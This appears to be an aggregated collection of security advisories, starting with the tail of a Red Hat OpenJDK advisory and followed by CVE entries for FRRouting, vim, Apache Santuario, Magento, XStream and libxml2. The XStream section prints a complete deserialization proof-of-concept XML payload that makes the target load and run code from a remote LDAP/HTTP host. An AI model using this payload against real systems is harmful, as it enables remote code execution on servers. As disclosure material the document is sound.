java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.ppc64le.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.ppc64le.rpm  s390x:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.s390x.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.s390x.rpm  x86_64:   java-1.8.0-openjdk-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-accessibility-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-debugsource-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-demo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-demo-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-devel-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-devel-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-headless-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-headless-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.332.b09-1.el8_2.x86_64.rpm   java-1.8.0-openjdk-src-1.8.0.332.b09-1.el8_2.x86_64.rpm  These packages are GPG signed by Red Hat for security. Our key and   details on how to verify the signature are available from   https://access.redhat.com/security/team/key/  7. References:  https://access.redhat.com/security/cve/CVE-2022-21426   https://access.redhat.com/security/cve/CVE-2022-21434   https://access.redhat.com/security/cve/CVE-2022-21443   https://access.redhat.com/security/cve/CVE-2022-21476   https://access.redhat.com/security/cve/CVE-2022-21496   https://access.redhat.com/security/updates/classification/#important  8. Contact:  The Red Hat security contact is <secalert@redhat.com>. More contact   details at https://access.redhat.com/security/team/contact/  Copyright 2022 Red Hat, Inc.   -----BEGIN PGP SIGNATURE-----   Version: GnuPG v1  iQIVAwUBYmbJcdzjgjWX9erEAQiaBBAAhsv+re6Xov/rKez1Zu38eQ3HX4oeHWVc   W/em2WfOnx52qXAoSOVSXOil7+b36Og8y+q/aTbfVqVYJgdvuXysGpbr5ny2M9Yo   JKvCMtvY01nQ7A1yZqejxBVmVTRpcb0uOJWnV1c2Ma9dozTNw++7bMybCeTVuU9H   A8R9l2gOnf82rQ0cLyktwBSicoPAC7B3HmMmE3K+D04bgzlBwQUJniLA7oE+Z5HC   yA0nZiH629g0DBVpEEhEfsVjNbc+qAHrXk0r0FV6BaNCvZqqsk48+ma+jcMDgfJe   Uos/y3VRf31+msru1a2bhHRVUcMVvLjqD+hAHZV/WIf++YqkkojG5sSfdTL/jxrR   RTTB0vvfaPZJH2a7STkGqfAeKTWjWXBjVf9UeectEKPwW00PTgTTBEQ3I/22qADB   x+/MF382C4WhAVmviKke1tXfn0cJIuIJdPfnGuoSeNPxnIzw4hb385OeAInQdTkK   HgdVtJXmHSqG8DU5gaP9r5LCeU3GtogBwj9ARTZ2z5b2dbOOZSslzH80PUkjdi4w   /BTlG0LTgGj06lgfX64GOhTadEsVTHuNaKFfk2a2781ETLF3Cv67fMrLl2jfM70r   +Npu8oJ/sBX5TK4Whv+hEDZBQcBUDge5xEDJ2J/m4MxI3XyAVkl88CT1tuGjYbS7   nGyAfWdwLoY=   =0y1v   -----END PGP SIGNATURE-----   --   RHSA-announce mailing list   RHSA-announce@redhat.com   https://listman.redhat.com/mailman/listinfo/rhsa-announce  `

Red Hat Security Advisory 2022-1489-01

Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to the use of strdup with a non-zero-terminated binary string in isis_nb_notifications.c.

At Line 470 in the code below, we call yang_data_new, which will further call strdup(raw_pdu). However, raw_pdu is not guaranteed to be a zero-terminated string and, thus, will lead to a stack overflow in strdup. When I set raw_pdu[raw_pdu_len - 1] to \0, then the bug disappears. Note that strdup should be used with a C-string.

In the same file, isis_nb_notifications.c, there are **8 places** where yang_data_new are used with raw_pdu and, thus, may have the overflow bug. Please check and suggest a fix. I can give a pull request then.

void isis\_notif\_id\_len\_mismatch(const struct isis\_circuit \*circuit,

uint8\_t rcv\_id\_len, const char \*raw\_pdu,

size\_t raw\_pdu\_len)

{

const char \*xpath = "/frr-isisd:id-len-mismatch";

struct list \*arguments = yang\_data\_list\_new();

char xpath\_arg\[XPATH\_MAXLEN\];

struct yang\_data \*data;

struct isis\_area \*area = circuit->area;

notif\_prep\_instance\_hdr(xpath, area, "default", arguments);

notif\_prepr\_iface\_hdr(xpath, circuit, arguments);

snprintf(xpath\_arg, sizeof(xpath\_arg), "%s/pdu-field-len", xpath);

data = yang\_data\_new\_uint8(xpath\_arg, rcv\_id\_len);

listnode\_add(arguments, data);

snprintf(xpath\_arg, sizeof(xpath\_arg), "%s/raw-pdu", xpath);

data = yang\_data\_new(xpath\_arg, raw\_pdu);

listnode\_add(arguments, data);

What follows is the output of the address sanitizer:

    ==48351==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0x7ffe596a3a76 at pc 0x000000543e97 bp 0x7ffe596a3020 sp 0x7ffe596a27e0
    READ of size 23 at 0x7ffe596a3a76 thread T0
        #0 0x543e96 in strdup (/home/parallels/myfrr/isisd/isisd+0x543e96)
        #1 0x84f73d in yang_data_new /home/parallels/myfrr/lib/yang.c:608:17
        #2 0x6716eb in isis_notif_id_len_mismatch /home/parallels/myfrr/isisd/isis_nb_notifications.c:470:9
        #3 0x5cedcf in isis_handle_pdu /home/parallels/myfrr/isisd/isis_pdu.c:1706:3

CVE-2022-26126: isisd: misusing strdup leads to stack overflow · Issue #10505 · FRRouting/frr

Insufficient Input Validation in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 allows an authenticated remote attacker with Object Modification privileges to insert arbitrary HTML without code execution.

CVE-2021-42117: Release Notes - TopEase Documentation

vim is vulnerable to Heap-based Buffer Overflow

@@ -464,13 +464,13 @@ win\_redr\_status(win\_T \*wp, int ignore\_pum UNUSED)

\*(p + len++) = ' ';

if (bt\_help(wp->w\_buffer))

{

STRCPY(p + len, \_("\[Help\]"));

vim\_snprintf((char \*)p + len, MAXPATHL - len, "%s", \_("\[Help\]"));

len += (int)STRLEN(p + len);

}

#ifdef FEAT\_QUICKFIX

if (wp->w\_p\_pvw)

{

STRCPY(p + len, \_("\[Preview\]"));

vim\_snprintf((char \*)p + len, MAXPATHL - len, "%s", \_("\[Preview\]"));

len += (int)STRLEN(p + len);

}

#endif

@@ -480,12 +480,12 @@ win\_redr\_status(win\_T \*wp, int ignore\_pum UNUSED)

#endif

)

{

STRCPY(p + len, "\[+\]");

len += 3;

vim\_snprintf((char \*)p + len, MAXPATHL - len, "%s", "\[+\]");

len += (int)STRLEN(p + len);

}

if (wp->w\_buffer\->b\_p\_ro)

{

STRCPY(p + len, \_("\[RO\]"));

vim\_snprintf((char \*)p + len, MAXPATHL - len, "%s", \_("\[RO\]"));

len += (int)STRLEN(p + len);

}

CVE-2021-3872: patch 8.2.3487: illegal memory access if buffer name is very long · vim/vim@826bfe4

All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2021-40690

Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an XML Injection vulnerability in the Widgets Update Layout. An attacker with admin privileges can trigger a specially crafted script to achieve remote code execution.

Security Updates Available for Adobe Commerce | APSB21-64

Magento has released updates for Adobe Commerce and Magento Open Source editions. These updates resolve vulnerabilities rated critical and important. Successful exploitation could lead to arbitrary code execution.       

**Product**

**Version**

**Platform**

Adobe Commerce  

2.4.2 and earlier versions    

All  

2.4.2-p1 and earlier versions    

All

2.3.7 and earlier versions   

All  

Magento Open Source 

2.4.2-p1 and earlier versions  

All

2.3.7 and earlier versions     

All

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version.

Product

Updated Version

Platform

Priority Rating

Release Notes

Adobe Commerce  

2.4.3    

All  

2  

2.4.x release notes

2.3.x release notes

2.4.2-p2  

All  

2  

2.3.7-p1  

All  

2  

Magento Open Source   

2.4.3    

All  

2  

2.4.2-p2  

All

2

2.3.7-p1   

All  

2  

Vulnerability Category

Vulnerability Impact

Severity

Pre-authentication?

Admin privileges required?

**CVSS base score**  

**CVSS vector**  

Magento Bug ID

CVE numbers

Business Logic Errors (CWE-840)  

Security feature bypass

 Important

yes

no

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

 PRODSECBUG-2934

CVE-2021-36012

Cross-site Scripting (Stored XSS) (CWE-79)

Arbitrary code execution

Important

no

no

6.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

PRODSECBUG-2963

PRODSECBUG-2964

CVE-2021-36026

CVE-2021-36027

Improper Access Control (CWE-284)

Arbitrary code execution

Critical

yes

yes

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

PRODSECBUG-2977

CVE-2021-36036

Improper Authorization (CWE-285)

Security feature bypass

Critical

yes

yes

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

PRODSECBUG-2968

CVE-2021-36029

Improper Authorization (CWE-285)

Security feature bypass

Important

no

no

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

PRODSECBUG-2980

CVE-2021-36037

Improper Input Validation (CWE-20)

Application denial-of-service

Critical

No

no

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

PRODSECBUG-3004

CVE-2021-36044

Improper Input Validation (CWE-20)

Privilege escalation

Critical

yes

no

8.3

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

PRODSECBUG-2971

CVE-2021-36032

Improper Input Validation (CWE-20)

Security feature bypass

Critical

no

no

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

 PRODSECBUG-2969

CVE-2021-36030

Improper Input Validation (CWE-20)

Security feature bypass

Important

no

no

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

PRODSECBUG-2982

CVE-2021-36038

Improper Input Validation (CWE-20)

Arbitrary code execution

Critical

yes

yes

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

 PRODSECBUG-2959

 PRODSECBUG-2960

 PRODSECBUG-2962

PRODSECBUG-2975

PRODSECBUG-2976

PRODSECBUG-2987

PRODSECBUG-2988

PRODSECBUG-2992

CVE-2021-36021

CVE-2021-36024

CVE-2021-36025

CVE-2021-36034

CVE-2021-36035

CVE-2021-36040

CVE-2021-36041

CVE-2021-36042

Path Traversal

(CWE-22)

Arbitrary code execution

Critical

yes

yes

7.2

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

PRODSECBUG-2970

CVE-2021-36031

OS Command Injection (CWE-78)

Arbitrary code execution

Critical

yes

yes

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

PRODSECBUG-2958

PRODSECBUG-2960

CVE-2021-36022

CVE-2021-36023

Incorrect Authorization (CWE-863)

Arbitrary file system read

Important

yes

no

6.5

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

PRODSECBUG-2984

CVE-2021-36039

Server-Side Request Forgery (SSRF)

(CWE-918)

Arbitrary code execution

Critical

yes

yes

8

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

PRODSECBUG-2996

CVE-2021-36043

XML Injection

(aka Blind XPath Injection) (CWE-91)

Arbitrary code execution

Critical

no

no

8.2

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

PRODSECBUG-2937

CVE-2021-36020

XML Injection

(aka Blind XPath Injection) (CWE-91)

Arbitrary code execution

Critical

yes

yes

9.1

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

 PRODSECBUG-2965

PRODSECBUG-2972

CVE-2021-36028

CVE-2021-36033

Pre-authentication:  The vulnerability is exploitable without credentials.   

Admin privileges required:  The vulnerability is only exploitable by an attacker with administrative privileges.  

Adobe would like to thank the following individuals for reporting the relevant issues and for working with Adobe to help protect our customers:   

*   Blaklis (CVE-2021-36023, CVE-2021-36026, CVE-2021-36027, CVE-2021-36036, CVE-2021-36029, CVE-2021-36021, CVE-2021-36024, CVE-2021-36025, CVE-2021-36034, CVE-2021-36035, CVE-2021-36031)
*   Igorsdv (CVE-2021-36012)
*   Zb3 (CVE-2021-36037, CVE-2021-36032, CVE-2021-36038, CVE-2021-36040, CVE-2021-36041, CVE-2021-36042, CVE-2021-36039, CVE-2021-36043, CVE-2021-36033, CVE-2021-36028)
*   Dftrace (CVE-2021-36044)
*   Floorz (CVE-2021-36030)
*   Eboda (CVE-2021-36022)
*   Trivani Pant on behalf of Broadway Photo Supply Limited (CVE-2021-36020)  
    

August 13, 2021: Updated Magento/Magento commerce with Adobe Commerce. 

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-36022: Adobe Security Bulletin

XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

**Vulnerability**

CVE-2021-39145: XStream is vulnerable to an Arbitrary Code Execution attack.

**Affected Versions**

All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

**Description**

The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.

**Steps to Reproduce**

Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream:

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn\_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m\_\_obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m\_\_obj>
      </value>
    </javax.naming.ldap.Rdn\_-RdnEntry>
    <javax.naming.ldap.Rdn\_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP\_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1\_1.Message1\_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
              <soapPart/>
              <mm>
                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                  <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                    <homeCtx>
                      <hostname>233.233.233.233</hostname>
                      <port\_\_number>2333</port\_\_number>
                      <clnt class='com.sun.jndi.ldap.LdapClient'/>
                    </homeCtx>
                    <hasMoreCalled>true</hasMoreCalled>
                    <more>true</more>
                    <posn>0</posn>
                    <limit>1</limit>
                    <entries>
                      <com.sun.jndi.ldap.LdapEntry>
                        <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
                        <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ignoreCase>false</ignoreCase>
                            </default>
                            <int>4</int>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>objectClass</attrID>
                                </default>
                                <int>1</int>
                                <string>javanamingreference</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaCodeBase</attrID>
                                </default>
                                <int>1</int>
                                <string>http://127.0.0.1:2333/</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaClassName</attrID>
                                </default>
                                <int>1</int>
                                <string>refClassName</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaFactory</attrID>
                                </default>
                                <int>1</int>
                                <string>Evil</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                          </javax.naming.directory.BasicAttribute>
                        </attributes>
                      </com.sun.jndi.ldap.LdapEntry>
                    </entries>
                  </aliases>
                </it>
              </mm>
            </multiPart>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn\_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

XStream xstream = new XStream();
xstream.fromXML(xml);

Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.

Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.

**Impact**

The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.

**Workarounds**

See workarounds for the different versions covering all CVEs.

**Credits**

李安诺 (Li4n0) from Alibaba Cloud Security Team and Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue independently to XStream and provided the required information to reproduce it.

CVE-2021-39145: XStream - CVE-2021-39145

There's a flaw in libxml2 in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by an application linked with libxml2 could trigger a use-after-free. The greatest impact from this flaw is to confidentiality, integrity, and availability.

\-------------------------------------------------------------------------------- Fedora Update Notification FEDORA-2021-e3ed1ba38b 2021-05-10 01:04:26.835396 -------------------------------------------------------------------------------- Name : libxml2 Product : Fedora 34 Version : 2.9.10 Release : 12.fc34 URL : http://xmlsoft.org/ Summary : Library providing XML and HTML support Description : This library allows to manipulate XML files. It includes support to read, modify and write XML and HTML files. There is DTDs support this includes parsing and validation even with complex DtDs, either at parse time or later once the document has been modified. The output can be a simple SAX stream or and in-memory DOM like representations. In this case one can use the built-in XPath and XPointer implementation to select sub nodes or ranges. A flexible Input/Output mechanism is available, with existing HTTP and FTP modules and combined to an URI library. -------------------------------------------------------------------------------- Update Information: Fix CVE-2021-3516, CVE-2021-3517, CVE-2021-3518 and CVE-2021-3537 -------------------------------------------------------------------------------- ChangeLog: \* Thu May 6 2021 David King <amigadave(a)amigadave.com&gt; - 2.9.10-12 - Fix CVE-2021-3537 (#1956524) \* Wed May 5 2021 David King <amigadave(a)amigadave.com&gt; - 2.9.10-11 - Fix CVE-2021-3516 (#1954227) - Fix CVE-2021-3517 (#1954234) - Fix CVE-2021-3518 (#1954243) -------------------------------------------------------------------------------- References: \[ 1 \] Bug #1954227 - CVE-2021-3516 libxml2: use-after-free in xmlEncodeEntitiesInternal() in entities.c \[fedora-all\] https://bugzilla.redhat.com/show\_bug.cgi?id=1954227 \[ 2 \] Bug #1954234 - CVE-2021-3517 libxml2: heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c \[fedora-all\] https://bugzilla.redhat.com/show\_bug.cgi?id=1954234 \[ 3 \] Bug #1954243 - CVE-2021-3518 libxml2: use-after-free in xmlXIncludeDoProcess() in xinclude.c \[fedora-all\] https://bugzilla.redhat.com/show\_bug.cgi?id=1954243 \[ 4 \] Bug #1956524 - CVE-2021-3537 libxml2: NULL pointer dereference in valid.c in xmlValidBuildAContentModel \[fedora-all\] https://bugzilla.redhat.com/show\_bug.cgi?id=1956524 -------------------------------------------------------------------------------- This update can be installed with the "dnf" update program. Use su -c 'dnf upgrade --advisory FEDORA-2021-e3ed1ba38b' at the command line. For more information, refer to the dnf documentation available at http://dnf.readthedocs.io/en/latest/command\_ref.html#upgrade-command-label All packages are signed with the Fedora Project GPG key. More details on the GPG keys used by the Fedora Project can be found at https://fedoraproject.org/keys --------------------------------------------------------------------------------

Tag

#xpath